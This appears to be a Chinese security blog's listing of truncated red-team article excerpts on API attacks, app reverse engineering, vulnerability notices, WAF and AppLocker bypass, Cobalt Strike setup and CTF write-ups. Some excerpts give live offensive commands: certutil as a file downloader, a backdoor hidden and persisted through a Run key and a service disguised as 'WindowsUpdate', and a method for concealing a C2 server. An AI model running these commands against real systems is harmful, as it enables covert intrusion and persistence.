红队攻击面相关讨论

必要性前后端分离已经成为web的一大趋势，通过Tomcat+Ngnix(也可以中间有个Node.js)，有效地进行解耦。并且前后端分离会为以后的大型分布式架构、弹性计算架构、微服务架构、多端化服务（多种客户端，例如：浏览器，车载终端，安卓，IOS等等）打下坚实的基础。而API就承担了前后端的通信的职责。所以学习api安全很有必要。 本文的思路在于总结一些api方面常见的攻击面。笔者在这块也尚在学习中，如有错误，还望各位斧正。 常见的api技术GraphQLGraphQL 是一个用于 API 的查询语言 通常有如下特征： （1）数据包都是发送至/graphql接口 （2）其中包含了很多换行符\n {"query":"\n query IntrospectionQuery {\r\n __schema {\r\n queryType { name }\r\n mutationType { name }\r\n subscriptionType { name }\r\n types {\r\n ...FullType\r\n }\r\n directives {\r\n name\r\n description\r\n locations\r\n args {\r\n ...InputValue\r\n }\r\n …

一、客户端程序安全测试1.检查apk的信息 java -jar GetApkInfo.jar tfkj.apk 2.数字签名检查 C:\Program Files\Java\jdk1.8.0_111\bin\jarsigner.exe -verify C:\Users\bk\Desktop\天府科技云APP\天府科技云服务平台\天府科技云服务平台.apk C:\Program Files\Java\jdk1.8.0_111\bin\jarsigner.exe -verify C:\Users\bk\Desktop\天府科技云APP\天府科技云服务平台\天府科技云服务平台.apk -verbose -certs 开发者证书不规范，导致开发者身份信息不明 keytool.exe -printcert -file .\CERT.RSA 3.反编译检查 通过ApkScan.jar查看APP加固类型 apk反编译为Java源代码: 把 apk 当成 zip 并解压，得到 classes.dex 文件 将解压出来的classes.dex文件拷贝到dex2jar工具文件夹中 执行命令：d2j-dex2jar classes.dex 执行完毕后，得到反编译而来的classes-dex2jar.jar文件 使用jd-gui.exe或者luyten-0.5.4打开 classes-dex2jar.jar文件，得到360安全加固混淆加密的源代码。 apk编译为smali语言: java -jar …

一、APP抓包和逆向破解加密算法打开APP是一个登录框 抓包后发现参数被加密了 使用Jadx脱源码发现，并没有加壳也没有混淆，运气很好 根据经验，先搜索Encrypt、Decrypt等关键字，发现在Common.js中有一个encryptData函数 定位过去，一套加解密算法都写好了放在这 放到浏览器console里面调试，果然没错 二、寻找注入点首先测试了一下注入 明文：{"userName":"TEST'","passWord":"123456","osType":"android","osVersion":"5.1.1","appVersion":"20.06.04","loginType":"1","model":"V1938T","brand":"vivo","imei":"865166023309431","version":"new"} 密文：QSXBDUSV0QpJkd5tWYR90SshkWzZFVipkWUNFcK1GZzpkeZVjWWJ2asJDZwxWRl5kUrRVMFtWZOBHWTVUMr1kWSZFV4tmRSBFbyIWcsV0YXRGbZdHcwEVTsd0T0J1RjFWNXNlMrBTUhZlbSRnTXF2SOVEVwZEbSBFczEWVxAjVLxmMUBHZzYVY0d1TYp0VhNDbXNFNsVVYQx2VWhkTX50U41WW3JVbNlmTuNFR4VVYSJVVUFDbGJlTWhVUxFTVhZHcXNVMspnVoBnbTlFcxY1QoBTWv…

0x00 APT的历史起源背景 APT这个词汇最早起源于：2005年英国和美国的CERT组织发布了关于有针对性的社交工程电子邮件，放弃特洛伊木马以泄露敏感信息的第一个警告，尽管没有使用“APT”这个名字。但 “先进的持续威胁”一词被广泛引用，2006年的美国空军Greg Rattray上校经常被引用为创造该术语的个人。后来，在Stuxnet震网事件就是专门针对伊朗的核计划的黑客攻击就是一个APT攻击例子。在计算机安全领域以及越来越多的媒体中，APT这个术语几乎总是用来指向针对政府，公司和政治活动家的黑客攻击的高级持续模式，而且也延伸到涉及到群体这些攻击背后。作为一个术语，高级持续威胁（APT）可以被转移焦点到攻击出现次数。一个常见的误解是APT只针对西方国家。西方国家可能会更多地宣传针对西方国家的技术性APT，但许多国家的行为者都将网络空间安全作为收集有关个人和群体的情报的手段。在美国，网络司令部的任务是协调美国军方，应对高级持续网络威胁，也就是APT攻击。 同时，许多消息来源都觉得一些APT组织实际上隶属于或者代表着民族和国家。否则很难持有大量信息和资源，三类机构容易面临高级持续威胁的高风险，即：高等教育,金融机构,政府机构。 实际上，一个APT是有一套隐匿和持续攻击的框架的，往往针对特定的实体由一人或多人策划（一般是多人）。APT通常针对高价值目标出于商业或政治动机进行实施的。APT在长时间的攻击中依旧会尽可能的保证高度隐蔽性。而“高级”意味着使用恶意软件来攻击系统漏洞的复杂技术。“持续”过程表明，APT攻击…

0x00 漏洞描述 Atlassian Jira是澳大利亚Atlassian公司的一套缺陷跟踪管理系统。该系统主要用于对工作中各类问题、缺陷进行跟踪管理。 Atlassian Jira Server和Jira Data Center存在服务端模板注入漏洞，成功利用此漏洞的攻击者可对运行受影响版本的Jira Server或Jira Data Center的服务器执行任意命令，从而获取服务器权限，严重危害网络资产。 0x01 CVE编号 CVE-2019-11581 0x02 漏洞危害等级 高危 0x03 漏洞影响范围 AtlassianJira 4.4.x AtlassianJira 5.x.x AtlassianJira 6.x.x AtlassianJira 7.0.x AtlassianJira 7.1.x AtlassianJira 7.2.x AtlassianJira 7.3.x AtlassianJira 7.4.x AtlassianJira 7.5.x AtlassianJira 7.6.x < 7.6.14 AtlassianJira 7.7.x AtlassianJira 7.8.x AtlassianJira 7.9.x AtlassianJira 7.10.x AtlassianJira 7.11.x AtlassianJira 7.12.x AtlassianJira 7.13.x < 7.13.5 AtlassianJira 8.0.x < 8.0.3 AtlassianJira…

0# 什么是AWD 0.1# AWD赛制介绍 「 攻防模式 | AWD (Attack With Defense) 」 是 CTF比赛 「CTF Capture The Flag」 几种主要的比赛模式之一，该模式常见于线下赛。 在该模式中，每个队伍都拥有一个相同的初始环境 ( 我们称其为 GameBox )，该环境通常运行着一些特定的服务或应用程序，而这些服务通常包含一些安全漏洞。参赛队伍需要挖掘利用对方队伍服务中的安全漏洞，获取 Flag 以获得积分; 同时，参赛队伍也需要修补自身服务漏洞进行防御，以防被其他队伍攻击和获取 Flag。 主要特点为：强调实战性、实时性、对抗性，综合考量竞赛队的渗透能力和防护能力。 0.2# 比赛整体流程 赛前准备环节：我们会分配到多个靶机服务器，通常是分配给我们 SSH 或者 VNC 的用户名和密码，还有相关IP等信息 安全加固环节：我们需要先自己去登录靶机服务器，进行30分钟的安全加固（源码备份/弱口令修改/代码审计和修复/漏洞修复等） 自由攻击环节：安全加固时间过后，开始自由攻击环节，通过对别的队伍的靶机服务器进行攻击（弱口令/Web漏洞/系统漏洞等）获得Flag进行加分，对应队伍失分 1# 比赛环境 通常比赛环境有以下三种情况： 混合靶机情况：运维机器 Windows 10 + 攻击机 Kali Linux + Win靶机 Windows Server 2003/2008/2012 或者 Windows 7 + Linux靶机 Centos7.x 或者 Ubuntu 16.04/17.…

0x01 前言 提示：当个反面案例看就好，实际上拿下的方式远没有下文说的那么麻烦，只怪自己太心急… 本来是之前BC项目搞下来的一个推广站，当时只拿到了Shell 权限是一个普通用户，想提权进一步收集服务器上的信息时，发现运行各种东西都是权限拒绝，提示组策略阻止了这个程序，当时因为还有的别的事情，就没继续研究了（项目已获得有关部门授权，用户名比较敏感，后面全程打码）。 0x02 Bypass Applocker 最近突然想起来了，就继续搞一下，问了下群里的师傅 知道是什么东西以后就好说了，耐心找一找总会有收获的，附上Applocker介绍： https://baike.baidu.com/item/Applocker/2300852?fr=aladdin然后就找到3g师傅的一篇文章： https://3gstudent.github.io/3gstudent.github.io/Use-msxsl-to-bypass-AppLocker/具体怎么利用就自行看文章吧，看完文章后续的大概思路差不多就清晰了 0x03 上线到提权 我想的是bypass applocker让目标服务器执行我的马子上线后在进行后续的提权，然而Shell下执行 net user、tasklist /SVC等等都没得回显，不然可以通过进程对比判断下杀软（自己写的小轮子，目前可匹配进程已经增加到960+了：http://get-av.se7ensec.cn/） 既然不知道，那我就拼一拼人品，赌一下主机里没有杀软，通过上面3g师傅文章…

0x00 BGP（RFC 1771、 RFC 4271）定义 全称是Border Gateway Protocol, 对应中文是边界网关协议，最新版本是BGPv4。 BGP是互联网上一个核心的互联网去中心化自治路由协议。它的地位是核心的毫不夸张地说， 是目前唯一连接海陆空和7大洲4大洋的外部路由协议。BGP是最复杂的路由协议，属于应用层协议，其传输层使用TCP，默认端口号是179。因为是应用层协议，可以认为它的连接是可靠的，并且不用考虑底层的工作，例如fragment，确认，重传等等。 BGP是唯一使用TCP作为传输层的路由协议，其他的路由协议可能都还到不了传输层。 1.相关的重要概念 AS(Autonomous sydstem):自治系统，指在一个（有时是多个）组织管辖下的所有IP网络和路由器的全体，它们对互联网执行共同的路由策略。也就是说，对于互联网来说，一个AS是一个独立的整体网络。每个AS有自己唯一的编号。通常一个自治系统将会分配一个全局的唯一的16位号码， ASN范围:1-65535;1-64511属于公有ASN，而私有ASN:64512-65535。 AS PATH:路由每通过一个AS范围都会产生一个记录。 (路由防环机制)。 EBGP:外部BGP协议(EBGP)的主要作用是向外部路由器或AS提供更多信息。 IBGP:内部BGP协议(IBGP)的主要作用是向AS内部路由器提供更多信息。 2.BGP的3张表 邻居表(adjancy table):保存所有的BGP邻居信息。 BGP表(forwarding …

0x00 概观1.BloodHound介绍BloodHound是一种单页的JavaScript的Web应用程序，构建在Linkurious上，用Electron编译，NEO4J数据库是PowerShell/C# ingestor. BloodHound使用可视化图来显示Active Directory环境中隐藏的和相关联的主机内容。攻击者可以使用BloodHound轻松识别高度复杂的攻击路径，否则很难快速识别。防御者可以使用BloodHound来识别和防御那些相同的攻击路径。蓝队和红队都可以使用BloodHound轻松深入了解Active Directory环境中的权限关系。 BloodHound是由@ _wald0，@CptJesus，@ harmj0y共同开发。 2.入门基础BloodHound入门非常简单。完成后，请转到数据收集部分以开始收集数据，或使用BloodHound查看包含的数据库。 (1).windows此视频演示了NEO4J设置的过程：https://youtu.be/o22emeubrnk Neo4j需要Java环境，因此请确保您运行的是最新版本的Java。 转到neo4j.com/download并点击"下载服务器(Download Server)” 下载当前版本的neo4j Server for Windows，选择32位或64位。 解压缩在步骤4中下载的zip文件夹的内容。 打开以管理员身份运行的cmd.exe，然后…

0x00 原理 给服务器发送payload数据包，使得waf无法识别出payload,当apache,tomcat等web容器能正常解析其内容。如图一所示 0x02 实验环境 本机win10+xampp+某狗web应用防火墙最新版。为方便演示，存在sql注入的脚本中使用$_REQUEST["id"]来接收get,或者post提交的数据。waf配置为拦截url和post的and or 注入，如图所示： 发送get请求或利用hackbar插件发送post请求payload均被拦截，如图所示： 0x03 绕过WAF方法 一· 利用pipline绕过[该方法经测试会被某狗拦截] 原理： http协议是由tcp协议封装而来，当浏览器发起一个http请求时，浏览器先和服务器建立起连接tcp连接，然后发送http数据包（即我们用burpsuite截获的数据），其中包含了一个Connection字段，一般值为close，apache等容器根据这个字段决定是保持该tcp连接或是断开。当发送的内容太大，超过一个http包容量，需要分多次发送时，值会变成keep-alive，即本次发起的http请求所建立的tcp连接不断开，直到所发送内容结束Connection为close为止。 1. 关闭burp的Repeater的Content-Length自动更新，如图四所示，点击红圈的Repeater在下拉选项中取消update Content-Length选中。这一步至关重要！！！ 2. burp截获post提交 id=1 …

一、插件介绍Turbo Intruder 是一个 Burp Suite 扩展插件，用于发送大量 HTTP 请求并分析结果，可拥抱十亿请求攻击。它旨在处理那些需要异常速度、持续时间或复杂性的攻击来补充Burp Intruder。二、插件原理使用第一次请求的时候就建立好连接，后续获取资源都是通过这条连接来获取资源的长连接，它还使用了HTTP 管道(HTTP Pipelining )的方式来发送 请求，这种方式会在等待上一个请求响应的同时，发送下一个请求。而在发送过程中不需要等待服务器对前一个请求的响应；只不过，客户端还是要按照发送请求的顺序来接收响应。通过 HTTP 管道的方式发起请求是短连接(Connection: close )速度的 6000% 三、安装方式Burp Suite的BApp Store安装Turbo intuder插件 四、使用方式 选中数据包右键选择Send to turbo intruder（这里一定要抓取数据包，没有抓取是不会显示send to tubo intruder菜单） 此时会打开一个新的窗口，该窗口上半部分区域为原始的HTTP请求包，下半部分为操作代码，中间部分可以根据场景从下拉框中选择具体操作代码。每次打开时此处默认为Last code used，即为上次使用的代码。 其中代码区需要使用“%s”字符来代替需要进行Fuzz的部分。选择对应的操作代码点击最下方Attack即可开始攻击。具体使用细节，可结合第三部分使用场景。 五、使用场景1.验证码爆破主要出现在手机验证或者邮箱验证码登录以…

工具准备国外服务器一台 自由鲸（VPN） CS 4.4 nginx CS服务端配置服务器禁ping1、当服务器禁ping后，从某种角度可以判定为主机为不存活状态。 2、编辑文件/etc/sysctl.conf，在里面增加一行。net.ipv4.icmp_echo_ignore_all=1 之后使命命令sysctl -p使配置生效。 3、之后在ping就无法ping通了。这种方式nmap还是可以扫描到服务器的存活的。 修改端口1、编辑teamserver文件，搜索50050，将其改为任意端口即可，这里改成65000 2、保存退出，启动teamserver，发现端口已经变化。 修改默认证书1、因为cs服务端生成的证书含有cs的相关特征所有，这里进行修改替换。修改方式有两种，分别为生成密钥库和修改启动文件。无论是那种方式都需要删去原有的文件cobaltstrike.store。 方法一删除密钥库文件cobaltstrike.store（推荐）1、生成新的密钥库文件 2、查看证书 3、启动服务器查看证书签名是否相同，经查看证书签名是相同的。 方法二修改启动文件1、teamserver 是启动cs服务端的启动文件。里面有环境检测的部分，其中就包括密钥库的检测，这部分的写法是，如检测不到密钥库就使用命令生成新的密钥库，修改这里生成命令。 2、将teamserver中圈出来的部分需要修改 3、将其修改为如下内容： 4、删除原有的./cobaltstrike.store密钥库文件，下次启动时会自动生成新的密钥库文件 使用C…

一、前言 　OSSEC是一款开源的基于主机的入侵检测系统，可以简称为HIDS。它具备日志分析，文件完整性检查，策略监控，rootkit检测，实时报警以及联动响应等功能。它支持多种操作系统：Linux、Windows、MacOS、Solaris、HP-UX、AIX。属于企业安全之利器。 S/C运行模式，类似于zabbix ossec支持3种日志， Alert logging, firewall logging and event (archiving) logging server开通udp514（rsyslog），udp1514（ossec-remoted）端口监听，client会把实时状态数据发给server 集成fail2ban,iptables过滤，错误日志分析 详细的介绍和文档可以参考官网网站：http://www.ossec.net/ 二、系统环境 服务端： 　　计算机名：ossec-server IP地址：172.16.91.130 OS: centos7.0 　　客户端1： 　　计算机名： agent-linux IP地址：172.16.91.131 OS:ubunut14.04 客户端2： 　　计算机名： agent-win7 IP地址：172.16.91.143 OS:win7x86 三、ossec服务器端安装 Yum源的安装和配置 1、进入到 centos下yum文件夹 [root@localhost]# cd /etc/yum.repos.d/ 2、用wget下载repo文…

certutil在渗透测测试中的使用技巧 0x01 前言 最近在Casey Smith‏ @subTee的twitter上学到了关于certutil的一些利用技巧。本文将结合自己的一些经验，介绍certutil在渗透测试中的应用，对cmd下downloader的实现方法作补充。 0x02 certutil简介 用于备份证书服务管理,支持xp-win10 更多操作说明见https://technet.microsoft.com/zh-cn/library/cc755341(v=ws.10).aspx 0x03 渗透测试中的应用 1、downloader (1) 保存在当前路径，文件名称和下载文件名称相同 certutil -urlcache -split -f https://github.com/backlion/demo/blob/master/weblogic.py (2) 保存在当前路径，指定保存文件名称 certutil -urlcache -split -f https://github.com/backlion/demo/blob/master/weblogic.py test.py (3) 保存在缓存目录，名称随机 缓存目录位置： %USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content certutil …

相关推荐 自动化批量挖掘漏洞(edu) thumbnail.svg2022年9月27日 21:22 06359 Xray简单使用 thumbnail.svg2022年9月27日 21:30 0200714 xray与dirsearch联动 thumbnail.svg2022年3月10日 17:35 059311 功能介绍 1.9.3版本比1.9.1版本增加了172个新的POC，总POC数量达到了722个 社区高级版比社区版增加 子域名扫描功能 部分专项漏洞检测 更新日志 做了一些优化 优化扫描效率 增强子域名收集功能 增加了一些功能 添加burp的history导出文件转yml脚本的功能 log4j2-rce的检测 为自定义脚本(gamma)添加 格式化时间戳函数 进制转换函数 sha，hmacsha函数 url全字符编码函数 rev 字符串反向函数 添加 upper 字符串大写函数 dir() basename() body_string title_string 扫描时，可以指定POC的危害等级，分为low，medium，high，critical，通过--leve…

0x01前言 在Smart Install Client代码中发现了基于堆栈的缓冲区溢出漏洞，该漏洞攻击者无需身份验证登录即可远程执行任意代码。cisco Smart Install是一种“即插即用”的配置和图像管理功能，可为新的交换机提供简易的部署。该功能允许用户将思科交换机放置到到任何位置，将其安装到网络中，然后启动，无需其他配置要求。因此它可以完全控制易受攻击的网络设备。Smart Install是一种即插即用的配置和图像管理的功能，为新型交换机提供良好的图形界面管理。它能使初始化配置过程自动化，并通过当前加载操作系统的镜像提供新的交换机。该功能还可在配置发生变化的时候提供热插热拔的实时备份。需要注意的是，该功能在默认情况下客户端上是启用了的。 0x02漏洞描述 思科 IOS 和 IOS-XE 系统 Smart Install Client 代码中存在一处缓冲区栈溢出漏洞（CVE-2018-0171）。攻击者可以远程向 TCP 4786 端口发送一个恶意数据包，利用该漏洞，触发目标设备的栈溢出漏洞造成设备拒绝服务（DoS）或在造成远程命令执行，攻击者可以远程控制受到漏洞影响的网络设备。据悉，思科交换器 TCP 4786 端口是默认开放的 0x03检查漏洞 1.如果您的思科网络设备开放了TCP 4786端口，则易受到攻击，为了找到这样的设备，只需通过nmap扫描目标网络。 nmap -p T:4786 192.168.1.0/24 2.要检查网络设备是否开放了Smart Install Client客户端功能，以下示例…

0x00 事件背景 2019年4月17日，国家信息安全漏洞共享平台（CNVD）收录了由中国民生银行股份有限公司报送的Oracle WebLogic wls9-async反序列化远程命令执行漏洞（CNVD-C-2019-48814）。攻击者利用该漏洞，可在未授权的情况下远程执行命令。目前，官方补丁尚未发布，漏洞细节未公开。CNVD对该漏洞的综合评级为“高危” 0x01 漏洞情况分析 WebLogic Server是美国甲骨文（Oracle）公司开发的一款适用于云环境和传统环境的应用服务中间件，它提供了一个现代轻型开发平台，支持应用从开发到生产的整个生命周期管理，并简化了应用的部署和管理。 部分版本WebLogic中默认包含的wls9_async_response包，为WebLogic Server提供异步通讯服务。由于该WAR包在反序列化处理输入信息时存在缺陷，攻击者可以发送精心构造的恶意 HTTP 请求，获得目标服务器的权限，在未授权的情况下远程执行命令。 CNVD对该漏洞的综合评级为“高危”。 0x02 漏洞描述 近日，互联网爆出WebLogicwls9-async反序列化远程命令执行漏洞。攻击者利用该漏洞，可在未授权的情况下远程执行命令。该漏洞危害程度为高危(High)。目前，官方补丁尚未发布，漏洞细节未公开。 0x02 漏洞影响范围 1.影响产品： Oracle WebLogic Server10.3.6.0.0 Oracle WebLogic Server12.1.3.0.0 Oracle WebLogic…

安装和设置 系统要求 Cobalt Strike的最低系统要求 　　2 GHz +以上的cpu 　　2 GB RAM 　　500MB +可用空间 在Amazon的EC2上，至少使用较高核数的CPU（c1.medium，1.7 GB）实例主机。 支持的操作系统 以下系统支持Cobalt Strike Team Server： 　　Kali Linux 2018.4 - AMD64 　　Ubuntu Linux 16.04,18.04 - x86_64 Cobalt Strike客户端在以下系统上运行： 　　Windows 7及更高版本 　　MacOS X 10.13及以上版本 　　Kali Linux 2018.4 - AMD64 　　Ubuntu Linux 16.04,18.04 - x86_64 更新Cobalt Strike 要充分利用Cobalt Strike的功能，您必须使用许可证密钥更新许可产品。试用程序中包含执行此操作的更新程序 此程序接受许可证密钥并为您获取最新的Cobalt Strike版本。授权的Cobalt Strike软件包括防病毒的逃避功能，并删除了试用程序中未授许可申明。 windows 1.进入到到Cobalt Strike文件夹 2.双击update.bat Linux 输入以下内容： cd /path/to/cobaltstrike ./update MacOS X 1.进入到Cobalt Strike文件夹 2.双击“ Update Cobalt S…

Cobalt Strike 3.13现已推出。此版本添加了TCP Beacong，进程参数欺骗，并将Obfuscate和Sleep功能扩展到SMB和TCP Beacons。 TCP Beacon Cobalt Strike长期以来能够绕过命名管道。Cobalt Strike 3.13使用TCP Beacon扩展了这种点对点的pivot模型。现在，您可以使用绑定TCP Beacon作为权限提升和横向移动的目标。与SMB Beacon一样，您可以断开与TCP Beacon的连接，稍后再从另一个 Beacon（在同一个Cobalt Strike实例中）重新连接到它。 Cobalt Strike 3.13中的Pivot Listeners现在是stageless的反向TCP Beacon listeners。您可以从Beacon会话绑定一个pivot listener，并导出一个连接到它的stageless TCP Beacon artifact。 Cobalt Strike的SSH会话也能够控制TCP Beacon会话！是的，您现在可以通过SSH连接到数据 pivot 主机并使用它来恢复对Beacon网格的控制。 反向TCP Beacon的Pivot Listeners也可以通过SSH会话运行，但有一点需要注意：SSH守护进程通常仅限制反向端口转发到本地主机。您可以使用SSH配置中的GatewayPorts选项更改此设置。对于那些使用dropbear作为* NIX RAT的人，这是一个很好的附加pivoting选项 进程参数欺骗…

0x00 前言第一部分是关于CobaltStrike优质文章的集合关于新特性BOF资源的整合解决要用的时候找不到合适aggressor script或者BOF的问题如果有本repo没有涉及的优质内容，欢迎大家提交pr0x01 相关文章合集 1. 基础知识参考 Cobalt_Strike_wikiCobaltStrike4.0笔记cobaltstrike4.1笔记CobaltStrike相关网络文章集合Cobalt Strike 外部 C2【一、原理篇】Cobalt Strike 桌面控制问题的解决（以及屏幕截图等后渗透工具）Cobalt Strike & MetaSploit 联动2. 破解以及定制参考 IntelliJ-IDEA修改cobaltstrikeCobaltStrike二次开发环境准备Cobal Strike 自定义OneLiner通过反射DLL注入来构建后渗透模块（第一课）Cobalt Strike Aggressor Script （第一课）Cobalt Strike Aggressor Script （第二课）3. 使用技巧参考 Cobalt Strike Spear Phishrun CS in win -- teamserver.batRemote NTLM relaying through CS -- related to CVE_2018_8581Cobalt Strike Convet VPN渗透神器CS3.14搭建使用及流量分析CobaltStrike生成免杀shellcodeCS-notes--一系…

1.注册表启动注意：优先用这种方式来进行权限维持task.exe是CS生成的后门文件，这里后门文件可以对其做免杀隐藏文件shell attrib C:\Windows\task.exe +s +h注册表启动后门文件shell reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d "C:\Windows\task.exe" /f 2.windows服务自动启动隐藏文件shell attrib C:\Windows\task.exe +s +h服务自动启动执行后门文件shell sc create "WindowsUpdate" binpath= "cmd /c start C:\Windows\task.exe"shell sc config "WindowsUpdate" start= autoshell net start "WindowsUpdate"或者3.SharpStay.exe 自动化任务启动SharpStay.exe action=CreateService servicename=Debug command="C:\Windows\task.exe" 4.自动启动服务目录(win7系统才有效）shell copy "C:\Windows\task.exe" "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Sta…

0x01 CSRF定义 　　CSRF（Cross-site request forgery），中文名称：跨站请求伪造，也被称为：one click attack/session riding，缩写为：CSRF/XSRF。尽管听起来像跨站脚本XSS，但它与XSS非常不同，XSS利用站点内的信任用户，而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比，CSRF攻击往往不大流行（因此对其进行防范的资源也相当稀少）和难以防范，所以被认为比XSS更具危险性 0x02 CSRF危害 攻击者盗用了你的身份，以你的名义发送恶意请求。CSRF能够做的事情包括：以你名义发送邮件，发消息，盗取你的账号，甚至于购买商品，虚拟货币转账......造成的问题包括：个人隐私泄露以及财产安全。 0x03 CSRF漏洞形成原因 csrf漏洞的成因就是网站的cookie在浏览器中不会过期，只要不关闭浏览器或者退出登录，那以后只要是访问这个网站，都会默认你已经登录的状态。而在这个期间，攻击者发送了构造好的csrf脚本或包含csrf脚本的链接，可能会执行一些用户不想做的功能（比如是添加账号等）。这个操作不是用户真正想要执行的。 0x04 CSRF与XSS的区别 XSS： 攻击者发现XSS漏洞——构造代码——发送给受害人——受害人打开——攻击者获取受害人的cookie——完成攻击 CSRF： 攻击者发现CSRF漏洞——构造代码——发送给受害人——受害人打开——受害人执行代码——完成攻击 0x05 CSRF的原理 下…

DES弱加密之easy_BlockCipher下载附件得到2个文件：https://adworld.xctf.org.cn/media/task/attachments/5b8bcb28546b4423b481b13149abc99f.zip 分析题目，题目中给出了加密时的代码。 des-ofb.py: from Crypto.Cipher import DES f = open('key.txt', 'r') key_hex = f.readline()[:-1] # discard newline f.close() KEY = key_hex.decode("hex") IV = '13245678' a = DES.new(KEY, DES.MODE_OFB, IV) f = open('plaintext', 'r') plaintext = f.read() f.close() ciphertext = a.encrypt(plaintext) f = open('ciphertext', 'w') f.write(ciphertext) f.close()可知加密时采用了DES算法，并且在OFB模式下对明文进行加密。 因此在已知 IV = ‘12345678’ 的情况下，只需要知道Key，即可对密文进行破解。 根据已知信息，仅有IV以及未知的Key，所以想到DES加密种存在弱密钥。在 DES 的计算中，56bit 的密钥最终会被处理为 16 个轮密钥，每一个轮密钥用于 16 轮计算中的一轮，DES 弱密钥会使这 16 …

一、js代码分析之编码转换writeup:打开index.html <script src="script-min.js"></script> //首先调用.js脚本 <script type="text/javascript"> var ic = false; #默认ic值为false var fg = ""; function getFlag() { //function函数内的getfFlag按钮会触发相应事件 var token = document.getElementById("secToken").value; // #获取文本输入框中的值赋值给token ic = checkToken(token); //调用checkToken(token)这个函数进行检查赋值，该函数包在.js脚本中包含 fg = bm(token); //调用checkToken(token)这个函数进行赋值 showFlag() //定义showFlag() 函数 } function showFlag() { …

一、flag的提交格式flag{th1s_!s_a_d4m0_4la9}二、PDF隐写writeup:使用在线word转pdf工具，转成word文件，然后拖动就可以查看到flaghttps://app.xunjiepdf.com/pdf2word/ 三、GIF图片隐写一writeup: 1.使用Stegsolve工具的Frame Browser浏览器查看静态的图片 File Format: 文件格式，这个主要是查看图片的具体信息 Data Extract: 数据抽取，图片中隐藏数据的抽取 Frame Browser: 帧浏览器，主要是对GIF之类的动图进行分解，动图变成一张张图片，便于查看 Image Combiner: 拼图，图片拼接 2.二维码缺少三个小方块，而这些小方块被称为定位图案，用于标记二维码矩形的大小，用三个定位图案可以标识并确定一个二维码矩形的位置和方向。3.将静态图片截图保存下，使用phoshtop工具修复二维码图片，然后进行扫描 https://jiema.wwei.cn/（二维码在线识别工具） 四、jar隐写writeup: 1.用 jd-gui 打开，直接搜索：flag 2.通过base64解密得到flag{DajiDali_JinwanChiji}五、压缩包隐写之黑白图片writeup:1.用winhex查看这些图片，没有发现可利用信息，于是想到黑白可能代表二进制0和1。我们将白色视为0黑色视为1或者反过来尝试一遍。一共有104张图片正好是8的倍数，可以转为8个一对二进制，再转化为ASCII码。由于图片较多，我们…